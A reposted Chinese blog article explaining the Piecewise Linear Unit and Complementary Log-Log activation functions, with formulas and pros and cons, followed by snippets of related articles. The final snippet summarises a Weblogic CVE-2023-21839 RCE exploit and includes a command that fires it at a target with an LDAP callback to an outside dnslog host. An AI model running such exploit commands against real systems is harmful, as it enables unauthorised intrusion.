激活函数总结(二十三):激活函数补充(Piecewise Linear Unit、CLL)

news2025/1/23 3:57:09

激活函数总结(二十三):激活函数补充

  • 1 引言
  • 2 激活函数
    • 2.1 Piecewise Linear Unit激活函数
    • 2.2 Complementary Log-Log (CLL)激活函数
  • 3. 总结

1 引言

在前面的文章中已经介绍了介绍了一系列激活函数 (SigmoidTanhReLULeaky ReLUPReLUSwishELUSELUGELUSoftmaxSoftplusMishMaxoutHardSigmoidHardTanhHardswishHardShrinkSoftShrinkTanhShrinkRReLUCELUReLU6GLUSwiGLUGTUBilinearReGLUGEGLUSoftminSoftmax2dLogsoftmaxIdentityLogSigmoidBent IdentityAbsoluteBipolarBipolar SigmoidSinusoidCosineArcsinhArccoshArctanhLeCun TanhTanhExpGaussianGCUASUSQUNCUDSUSSUSReLUBReLUPELUPhishRBFSQ-RBFISRUISRLUSQNLPLUAPLInverse CubicSoft ExponentialParametricLinear)。在这篇文章中,会接着上文提到的众多激活函数继续进行介绍,给大家带来更多不常见的激活函数的介绍。这里放一张激活函数的机理图:
在这里插入图片描述

2 激活函数

2.1 Piecewise Linear Unit激活函数

论文链接:https://arxiv.org/abs/2104.03693

Piecewise Linear Unit分段激活函数,通过公式设计+可学习参数的方式,来达到算法SOTA的结果。其数学表达式和数学图像分别如下所示:
{ ( x − B L ) ∗ K L + Y P 0 , if  x < B L ( x − B R ) ∗ K R + Y P N , if  x ≥ B R ( x − B i d x ) ∗ K i d x + Y P i d x , if  B L ≤ x < B R \begin{cases} (x-B_L)*K_L+Y_P^0, & \text{if } x<B_L \\ (x-B_R)*K_R+Y_P^N, & \text{if } x \geq B_R \\ (x-B_{idx})*K_{idx}+Y_P^{idx}, & \text{if }B_L \leq x < B_R\\ \end{cases} (xBL)KL+YP0,(xBR)KR+YPN,(xBidx)Kidx+YPidx,if x<BLif xBRif BLx<BR在这里插入图片描述
其中,在 [ B L , B R ] [B_L, B_R] [BL,BR] 间被划分为 N 段,每一段都有其自己的斜率。

特性:(参考自:Piecewise Linear Unit:分段线性激活函数)

  • PWLU可以表示任意连续有边界的scalar function
  • PWLU变换连续,利于求导
  • 可以最大限度利用可学习参数
  • 由于我们划分段是N等分的,所以在计算,推理中是efficient的

优点:

  • 灵活性: “Piecewise Linear” 激活函数允许在不同区间内使用不同的线性函数,从而适应不同的数据模式和分布。
  • 逼近复杂性: 通过合理设置划分区间和线性函数的参数,这种激活函数能够逼近一些复杂的非线性特性。
  • 可解释性: 由于它由多个线性段组成,其行为相对容易解释,参数的含义也相对明确。

缺点:

  • 参数设置: 需要仔细选择划分区间、斜率和截距参数,以获得良好的性能。不恰当的参数设置可能会导致模型表现不佳。
  • 有限的表达能力: 尽管能够逼近一些非线性特性,但在某些复杂问题中,可能仍然无法捕捉到更深层次的非线性模式。
  • 计算开销: 需要根据划分区间的数量执行不同的线性函数计算,可能在计算上增加一定的开销

虽然作者提出Piecewise Linear Unit是为了让激活函数逼近表达出各种性质且表现出了很好的性质,但是论文代码仍为开源,当前仍未广泛使用。。。。。

2.2 Complementary Log-Log (CLL)激活函数

论文链接:Gomes, Gecynalda S. da S., and Teresa B. Ludermir. “Complementary log-log and probit: activation functions implemented in artificial neural networks.” In 2008 Eighth International Conference on Hybrid Intelligent Systems, pp. 939-942. IEEE, 2008.

Complementary Log-Log(CLL)激活函数是一种非常特殊的激活函数,通常用于极端稀疏数据的建模。它在广义线性模型(Generalized Linear Models,GLMs)和某些神经网络中被用作连接函数(link function),用于将线性输出映射到正实数范围。其数学表达式和数学图像分别如下所示:
f ( x ) = 1 − e − e x f(x)=1-e^{-e^x} f(x)=1eex在这里插入图片描述
优点:

  • 适用于极端稀疏数据: CLL 激活函数适用于具有极端稀疏性的数据,这种情况下其他激活函数可能表现不佳。
  • 连接函数: 在广义线性模型(GLMs)和某些神经网络中,CLL 可以作为连接函数,将线性输出映射到正实数范围。
  • 处理极值问题: CLL 可以对输入进行适当的转换,从而处理极值情况,使得模型更稳定

缺点:

  • 局限性: CLL 激活函数在特定场景下表现出色,但并不适用于所有问题。它在非稀疏数据和其他类型的模型中可能表现不佳
  • 数值计算开销: 由于涉及指数,CLL 激活函数可能在计算上较为昂贵。

总的来说,CLL激活函数可能在极端情况下会表现更为优秀。。。。。

3. 总结

到此,使用 激活函数总结(二十三) 已经介绍完毕了!!! 如果有什么疑问欢迎在评论区提出,对于共性问题可能会后续添加到文章介绍中。如果存在没有提及的激活函数也可以在评论区提出,后续会对其进行添加!!!!

如果觉得这篇文章对你有用,记得点赞、收藏并分享给你的小伙伴们哦😄。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/942773.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

数学建模:BP神经网络模型及其优化

&#x1f506; 文章首发于我的个人博客&#xff1a;欢迎大佬们来逛逛 文章目录 BP神经网络算法流程代码实现 神经网络的超参数优化代码实现 神经网络的分类 BP神经网络 算法流程 设 x 1 , x 2 , . . . , x i x_1,x_2,...,x_i x1​,x2​,...,xi​ 为输入变量&#xff0c; y y y…

图像分类学习笔记(六)——ResNeXt

一、要点 ResNeXt是ResNet的小幅升级&#xff0c;更新了block 左边&#xff08;ResNet的block/50/101/152层&#xff09;&#xff1a; 对于输入通道为256的特征矩阵&#xff0c;首先使用64个11的卷积核进行降维&#xff0c;再通过64个33的卷积核处理&#xff0c;再通过256个1…

volatile考点分析

今天我们学习并发编程中另一个重要的关键字volatile&#xff0c;虽然面试中它的占比低于synchronized&#xff0c;但依旧是不可忽略的内容。 关于volatile&#xff0c;我收集到了8个常见考点&#xff0c;围绕应用&#xff0c;特点和实现原理。 volatile有什么作用&#xff1f…

第六章:数据结构与算法-part2:数据的存储结构

文章目录 一、一般线性表存储1.1、线性表顺序存储1.2、线性表的链式存储1.2.1、 单链表1、单链表的存储2、单链表的基本操作的实现 1.2.2、双向链表 二、栈的存储结构2.1 顺序栈2.1.1、顺序栈的操作1、 初始化空栈2、插入3、删除操作pop4、获取栈顶元素 2.2 链栈 三、队列的存储…

精进面试技巧:如何在程序员面试中脱颖而出

&#x1f337;&#x1f341; 博主猫头虎 带您 Go to New World.✨&#x1f341; &#x1f984; 博客首页——猫头虎的博客&#x1f390; &#x1f433;《面试题大全专栏》 文章图文并茂&#x1f995;生动形象&#x1f996;简单易学&#xff01;欢迎大家来踩踩~&#x1f33a; &a…

Docker harbor 私有仓库的部署和管理

目录 一、什么是Harbor 二、Harbor的特性 三、Harbor的构成 四、部署配置Docker Harbor 1. 首先需要安装 Docker-Compose 服务 2.部署 Harbor 服务 3.使用harbor仓库 &#xff08;1&#xff09;项目管理 &#xff08;2&#xff09;用户管理 一、什么是Harbor Harbor …

面试前的准备:程序员应该如何备战面试

&#x1f337;&#x1f341; 博主猫头虎 带您 Go to New World.✨&#x1f341; &#x1f984; 博客首页——猫头虎的博客&#x1f390; &#x1f433;《面试题大全专栏》 文章图文并茂&#x1f995;生动形象&#x1f996;简单易学&#xff01;欢迎大家来踩踩~&#x1f33a; &a…

JavaScript 开发的asp网页获取RFID读卡器以http协议Request提交的访问文件,Response回应驱动设备显示文字

本示例使用的设备&#xff1a; 液显WIFI无线网络HTTP协议RFID云读卡器可编程实时可控开关TTS语-淘宝网 (taobao.com) <%LANGUAGE"JavaScript" CODEPAGE"65001"%><% //格式化显示系统日期时钟 function formatDate(time){var date new Date(time…

HAproxy(四十七)

提示&#xff1a;文章写完后&#xff0c;目录可以自动生成&#xff0c;如何生成可参考右边的帮助文档 目录 前言 一、概述 1.1 简介 1.2 核心功能 1.3 关键特性 1.4 应用场景 二、安装 1.内核配置 2.编译安装 ​3. 建立配置文件 4. 添加为系统服务 5. 添加3和5运行级别下自启动…

数据恢复软件EasyRecovery16最新版本下载安装激活教程

EasyRecovery16作为一款专业的数据电脑恢复软件&#xff0c;除了有着优秀的数据恢复能力外&#xff0c;还有许多便捷的操作技巧。即便是对于计算机很是白目的使用者来说&#xff0c;Ontack EasyRecovery也是值得入手的&#xff0c;使用者不必大费周章去备份重要的文件&#xff…

通达信股票接口怎么设计委托撤单模块?(通达信接口开发)

在股市里运用到的设计委托撤单模块的主要目标是实现通过通达信股票接口提交委托和撤单操作。以下是设计委托撤单模块的一般步骤&#xff1a; 1. 连接通达信接口&#xff1a;首先需要使用通达信股票接口连接到通达信系统软件&#xff0c;以便能够与交易系统进行通信。这通常涉及…

SpringBoot项目(jar)部署,启动脚本

需求 SpringBoot项目&#xff08;jar&#xff09;部署&#xff0c;需要先关闭原来启动的项目&#xff0c;再启动新的项目。直接输入命令&#xff0c;费时费力&#xff0c;还容易出错。所以&#xff0c;使用脚本启动。 脚本 脚本名&#xff1a;start.sh 此脚本需要放置在jar包…

三维模型OBJ格式轻量化压缩并行计算处理方法浅析

三维模型OBJ格式轻量化压缩并行计算处理方法浅析 三维模型的轻量化是指通过一系列技术和算法来减小三维模型的文件大小&#xff0c;以提高模型在计算机中的加载、渲染和传输效率。并行计算是利用多个计算单元同时执行任务&#xff0c;以加速计算过程的一种技术。在三维模型的O…

Dubbo指标埋点

1. 指标接入说明 2. 指标体系设计 Dubbo的指标体系&#xff0c;总共涉及三块&#xff0c;指标收集、本地聚合、指标推送 指标收集&#xff1a;将Dubbo内部需要监控的指标推送至统一的Collector中进行存储本地聚合&#xff1a;指标收集获取的均为基础指标&#xff0c;而一些分…

OpenAI推出ChatGPT企业版,提供更高安全和隐私保障

&#x1f989; AI新闻 &#x1f680; OpenAI推出ChatGPT企业版&#xff0c;提供更高安全和隐私保障 摘要&#xff1a;OpenAI发布了面向企业用户的ChatGPT企业版&#xff0c;用户可以无限制地访问强大的GPT-4模型&#xff0c;进行更深入的数据分析&#xff0c;并且拥有完全控制…

2023.8.24 关于 Selenium 的简单示例

目录 Selenium 是什么 Selenium 特点 Selenium 工作原理 流程图 使用 Selenium 实现一个简单自动化测试用例 Selenium 是什么 Selenium 是用来测试 Web 应用程序的功能和用户界面的 开源自动化测试工具 Selenium 特点 支持各种浏览器&#xff08;Chrome、Firefox、Safari&…

白皮书发布丨《多渠道协同,银行业数字化营销实践新范式》

数字化时代&#xff0c;银行业步入存量竞争阶段&#xff0c;各家银行在寻找新的市场增长点的同时&#xff0c;更重视现有客户的管理和挖掘&#xff0c;实现客户价值最大化。多渠道协同客群经营已经成为存量时代银行发展的核心竞争力。 神策数据今日发布《多渠道协同&#xff0c…

什么是伪类链(Pseudo-class Chaining)?

聚沙成塔每天进步一点点 ⭐ 专栏简介⭐ Pseudo-class Chaining⭐ 写在最后 ⭐ 专栏简介 前端入门之旅&#xff1a;探索Web开发的奇妙世界 记得点击上方或者右侧链接订阅本专栏哦 几何带你启航前端之旅 欢迎来到前端入门之旅&#xff01;这个专栏是为那些对Web开发感兴趣、刚刚…

Docker consul容器服务自动发现和更新

目录 一、什么是服务注册与发现 二、Docker-consul集群 1.Docker-consul 2.registrator 3.Consul-template 三、Docker-consul实现过程 四、Docker-consul集群配置 1.下载consul服务 2.web服务器启动多例nginx容器&#xff0c;使用registrator自动发现 3.使用…

CVE-2023-21839 Weblogic未授权RCE

https://github.com/4ra1n/CVE-2023-21839下载之后 生成CVE-2023-21389.exe 先试试dnslog&#xff1a; CVE-2023-21839.exe -ip 116.xx.xx.xx -port 7001 -ldap ldap://whoami.eduvck.dnslog.cn/aa然后使用JNDIExploit-1.4-SNAPSHOT.jar进行攻击 另一个终端上 首先开启监听 …